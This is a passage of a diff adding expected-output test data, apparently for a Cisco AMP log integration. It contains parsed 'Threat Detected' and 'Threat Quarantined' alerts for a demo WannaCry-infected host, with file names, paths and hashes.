+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":461000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.2CA2D550E6-100.SBX.VIOC\",\"detection_id\":\"6419303574240493599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskse.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskse.exe\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419303574240494000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.2CA2D550E6-100.SBX.VIOC",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Malicious",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419303574240493599",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "tasksche.exe",
+                "pid": 2920,
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "@timestamp": "2021-01-14T19:29:11.000Z",
+            "file": {
+                "name": "taskdl.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe",
+                "hash": {
+                    "sha256": "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843601745Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":430000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.4A468603FD.04426d77.auto.Talos\",\"detection_id\":\"6419303574240493597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskdl.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskdl.exe\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419303574240494000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.4A468603FD.04426d77.auto.Talos",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Malicious",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419303574240493597",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "tasksche.exe",
+                "pid": 2920,
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "@timestamp": "2021-01-14T19:29:11.000Z",
+            "file": {
+                "name": "u.wnry",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry",
+                "hash": {
+                    "sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10",
+                    "sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25",
+                    "md5": "7bf2b57f2a205768755c07f238fb32cc"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25",
+                    "7bf2b57f2a205768755c07f238fb32cc",
+                    "45356a9dd616ed7161a3b9192e2f318d0ab5ad10"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843603663Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":327000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419303574240493595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419303574240494000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Ransom:Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Malicious",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419303574240493595",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "tasksche.exe",
+                "pid": 2920,
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "@timestamp": "2021-01-14T19:29:11.000Z",
+            "file": {
+                "name": "@WanaDecryptor@.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe",
+                "hash": {
+                    "sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10",
+                    "sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25",
+                    "md5": "7bf2b57f2a205768755c07f238fb32cc"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25",
+                    "7bf2b57f2a205768755c07f238fb32cc",
+                    "45356a9dd616ed7161a3b9192e2f318d0ab5ad10"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843605546Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":313000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419303574240493594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"@WanaDecryptor@.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\@WanaDecryptor@.exe\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419303574240494000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Ransom:Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Malicious",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419303574240493594",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T19:29:11.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843607426Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303574240493595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
+                "kind": "alert",
+                "action": "Threat Quarantined",
+                "id": "6419303574240494000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "detection_id": "6419303574240493595",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648143
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T19:29:11.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843609310Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303574240493594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
+                "kind": "alert",
+                "action": "Threat Quarantined",
+                "id": "6419303574240494000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "detection_id": "6419303574240493594",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648143
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T19:29:11.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843611171Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303569945526290\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"}}}}",
+                "kind": "alert",
+                "action": "Threat Quarantined",
+                "id": "6419303574240494000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "detection_id": "6419303569945526290",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648143
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T19:29:11.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843613053Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303569945526289\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"}}}}",
+                "kind": "alert",
+                "action": "Threat Quarantined",
+                "id": "6419303574240494000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "detection_id": "6419303569945526289",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648143
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T19:29:11.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843615119Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558983\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Threat Quarantined",
+                "id": "6419303574240494000",
